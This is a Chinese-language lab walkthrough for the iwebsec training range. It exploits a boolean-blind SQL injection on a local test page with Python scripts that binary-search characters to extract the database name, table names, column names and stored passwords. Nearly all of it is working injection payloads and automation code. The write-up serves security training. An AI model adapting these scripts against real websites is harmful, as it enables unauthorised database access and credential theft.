目录
一、解题过程
(一)观察payload与结果
1.SQL执行有结果,就输出welcome to iwebsec!!!
2.否则输出1
(二)编写脚本逐项获取信息
1.获取数据库名字符串长度
先要为python安装requests包
pip install requests
python代码如下:
#encoding=utf-8
import requests
import os
url="http://192.168.182.130:8001/sqli/03.php"
def DbLen():
for i in range(1,20):
payload="?id=1 and (length(database())={})--+".format(i)
req_url=url+payload
rep=requests.get(url=req_url)
if "welcome to iwebsec!!!" in rep.text:
print("DB length is "+str(i))
DbLen()
2.获取数据库名
def DbName():
result=""
for i in range(1,8):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload="?id=1 and ord(mid((select database()),{},1))>{} --+".format(i,mid)
req_url=url+payload
#print(req_url)
rep=requests.get(url=req_url)
if "welcome to iwebsec!!!" in rep.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
DbName()
3.获取表名
def TablesName():
result=""
for i in range(1,50):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload='''?id=1 and ord(mid((select group_concat(table_name)
from information_schema.tables where table_schema=database()),{},1))>{} --+'''.format(i,mid)
req_url=url+payload
#print(req_url)
rep=requests.get(url=req_url)
if "welcome to iwebsec!!!" in rep.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
TablesName()
4.获取users表的列名
def ColumnsName():
result=""
for i in range(1,30):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload='''?id=1 and ord(mid((select group_concat(column_name)
from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{} --+'''.format(i,mid)
req_url=url+payload
#print(req_url)
rep=requests.get(url=req_url)
if "welcome to iwebsec!!!" in rep.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
ColumnsName()
5.获取password字段的数据
def GetData():
result=""
for i in range(1,20):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload="?id=1 and ord(mid((select group_concat(password) from iwebsec.users),{},1))>{} --+".format(i,mid)
req_url=url+payload
#print(req_url)
rep=requests.get(url=req_url)
if "welcome to iwebsec!!!" in rep.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
GetData()